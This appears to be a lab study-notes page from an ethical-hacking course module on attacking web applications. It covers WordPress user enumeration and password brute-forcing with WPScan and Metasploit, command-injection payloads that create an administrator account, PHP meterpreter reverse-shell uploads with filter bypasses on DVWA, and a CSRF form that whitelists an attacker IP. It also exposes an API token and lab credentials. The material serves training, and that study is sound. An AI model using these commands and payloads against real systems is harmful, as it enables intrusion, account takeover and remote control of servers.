14 - Hacking Web Apps

Module 14: Hacking Web Applications

What is a Web App?

Web App is a software application that runs on web browsers over the internet. Unlike traditional desktop applications, web apps do not need to be installed on a user's device, and users can access them from various devices with internet connectivity and a compatible web browser. Web apps are designed to provide a wide range of functionalities and services, and they have become an integral part of modern online experiences.

Here are some key characteristics and features of web applications:

Accessibility: Web apps are accessible from any device with an internet connection and a web browser. This makes them platform-independent, as they can run on computers, smartphones, tablets, and other devices.
No Installation: Users do not need to download or install web apps on their devices. They can simply access them by navigating to a specific web address (URL).
Client-Server Architecture: Web apps typically follow a client-server architecture. The web browser on the client side interacts with a remote server that hosts the application's back-end logic and data.
Interactivity: Web apps can offer a wide range of interactive features, such as online shopping, social networking, email, collaboration tools, and more.
Updates and Maintenance: Updates and maintenance of web apps are typically handled on the server side. Users do not need to manually update the application on their devices.
Cross-Platform Compatibility: Web apps are designed to work across different operating systems and devices, as long as they have compatible web browsers.
Responsive Design: Many web apps incorporate responsive design techniques to adapt to various screen sizes and orientations, ensuring a good user experience on both desktop and mobile devices.
Security: Web app developers need to pay careful attention to security to protect user data and the application itself from various online threats.
User Authentication: Web apps often include user authentication and authorization features to control access to specific parts of the application or data.
Dynamic Content: Web apps can deliver dynamic content that changes based on user interactions, user input, or real-time data updates.

User Enumeration and Brute Force Attack

WP user enumeration

wpscan --url http://10.10.10.12:8080 --enumerate u

WP password bruteforce

msfconsole
use auxiliary/scanner/http/wordpress_login_enum

RCE

ping 127.0.0.1 | hostname | net user

Perform a Brute-force Attack using Burp Suite

Set proxy for browser: 127.0.0.1:8080
Burpsuite
Type random credentials
capture the request, right click->send to Intrucder
Intruder->Positions
Clear $
Attack type: Cluster bomb
select account and password value, Add $
Payloads: Load wordlist file for set 1 and set 2
start attack
filter status==302
open the raw, get the credentials
recover proxy settings

🟧Burp Suite

Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications

Log in a website, change the parameter value (id )in the URL
Conduct a XSS attack: Submit script codes via text area

Enumerate and Hack a Web Application using WPScan and Metasploit

wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url http://10.10.10.16:8080/CEH --plugins-detection aggressive --enumerate u
- --enumerate u: Specify the enumeration of users
- API Token: Register at https://wpscan.com/register
- Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads
service postgresql start
msfconsole
use auxiliary/scanner/http/wordpress_login_enum
show options
set PASS_FILE password.txt
set RHOST 10.10.10.16
set RPORT 8080
set TARGETURI http://10.10.10.16:8080/CEH
set USERNAME admin
run
Find the credential, and use URL http://[IP Address of Windows Server 2012]:8080/CEH/wp-login.php to login.

🔍WPScan

Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)

If found command injection vulnerability in an input textfield
| hostname
| whoami
| tasklist| Taskkill /PID /F
- /PID: Process ID value od the process
- /F: Forcefully terminate the process
| dir C:\
| net user
| net user user001 /Add
| net user user001
| net localgroup Administrators user001 /Add
Use created account user001 to log in remotely

File Upload Vulnerability – All Levels DVWA

Payload Creation

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw | create a raw php code
Copy the code in a text file and save as .php

Low Level Exploitation

Upload the file | note the path /dvwa/hackable/uploads/.php
Run listener by starting msfconsole
Type use exploit/multi/handler
Type set payload php/meterpreter/reverse_tcp
Type set LHOST 10.10.10.11
Start listener, type exploit Browse link of file to start meterpreter session.

Medium Level Exploitation

Rename file as .php.jpg
While uploading, intercepting with burp and rename back to .php
Run listener by starting msfconsole
Type use exploit/multi/handler
Type set payload php/meterpreter/reverse_tcp
Type set LHOST 10.10.10.11
Start listener, type exploit
Browse link of file to start meterpreter session.

High Level Exploitation

Open the .php file and add code GIF98 at start and save file as .jpg
Upload file
Now go to command execution tab and use command <Some IP>||copy C:\wamp64\www\DVWA\hackable\uploads<filename>.jpg C:\wamp64\www\DVWA\hackable\uploads\shell.php
Run listener by starting msfconsole
Type use exploit/multi/handler
Type set payload php/meterpreter/reverse_tcp
Type set LHOST 10.10.10.11 Start listener, type exploit
Browse link of file to start meterpreter session.

Cross-Site Request Forgery (CSRF)

What is CSRF?

Cross-Site Request Forgery (CSRF) is a type of web security vulnerability and attack. In a CSRF attack:

Attackers trick users into unknowingly making malicious requests to a web application they're already authenticated on, often by embedding malicious code in a website, email, or other web content.
The victim's browser, while authenticated, sends the unauthorized request to the target web application without the user's consent.
The web application, unable to distinguish between legitimate and forged requests, processes the request as if it came from the authenticated user.
This can lead to actions like changing account settings or making financial transactions without the user's knowledge or consent.

Here below an example to exploit it.

Open http://10.10.10.12:8080/CEH/wp-login.php | admin:qwerty@123
Plugins -> Installed Plugins -> Firewall 2 -> Settings -> View Whitelisted IP
Run command wpscan -u http://10.10.10.12:8080/CEH --enumerate vp | vp vulnerable plugins
Create a form with code
Save as <filename.html>

<form method="POST" action="http://10.10.10.12:8080/CEH/wp-admin/options-general.php?
page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
<script>alert("As an Admin, To enable additional security to your Website. Click Submit")</script>
<input type="hidden" name="whitelisted_ip[]" value="10.10.10.11" >
<input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs" class="button-
secondary">
<input type="submit">
</form>

Get victim to run it.

Additional Resources

Web Scanners

How to find Web Server Vulnerabilities with Nikto Scanner ?Geekflare

https://blog.sucuri.net/2015/12/using-wpscan-finding-wordpress-vulnerabilities.htmlhttps://www.hackingtutorials.org/web-application-hacking/hack-a-wordpress-website-with-wpscan/https://linuxhint.com/wpscan_wordpress_vulnerabilities_scan/blog.sucuri.net

Hack Like a Pro: How to Crack Passwords, Part 5 (Creating a Custom Wordlist with CeWL)WonderHowTo

Checking the Password Strength of WordPress Users with WPScanWP White Security

YT videos

https://www.youtube.com/watch?v=K78YOmbuT48 https://www.youtube.com/watch?v=SS991k5Alp0 https://www.youtube.com/watch?v=MtyhOrBfG-E https://www.youtube.com/watch?v=sQ4TtFdaiRA https://www.youtube.com/watch?v=BTGP5sZfJKY

Previous13 - Hacking Web Servers Next15 - SQL Injection

Last updated 10 months ago